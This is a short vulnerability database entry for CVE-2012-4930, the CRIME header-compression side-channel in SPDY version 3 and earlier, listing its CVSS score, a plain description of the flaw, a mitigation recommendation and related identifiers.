PT-2012-5665 · Google · Spdy

Tomas Hoger

Published

2012-09-15

Updated

2024-03-12

CVE-2012-4930

CVSS v2.0

2.6

Low

Vector

AV:N/AC:H/Au:N/C:P/I:N/A:N

Name of the Vulnerable Software and Affected Versions SPDY protocol versions 3 and earlier

Description The issue allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, also known as a "CRIME" attack. This is due to the SPDY protocol performing TLS encryption of compressed data without properly obfuscating the length of the unencrypted data.

Recommendations For SPDY protocol versions 3 and earlier, consider disabling the use of TLS encryption with compressed data until a proper fix is implemented to obfuscate the length of the unencrypted data.

Exploit

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-310

Related Identifiers

CVE-2012-4930

ROSA-SA-2024-2371

Affected Products

Spdy

PT-2012-5665 · Google · Spdy

CVE-2012-4930

Weakness Enumeration

Related Identifiers

Affected Products

References · 105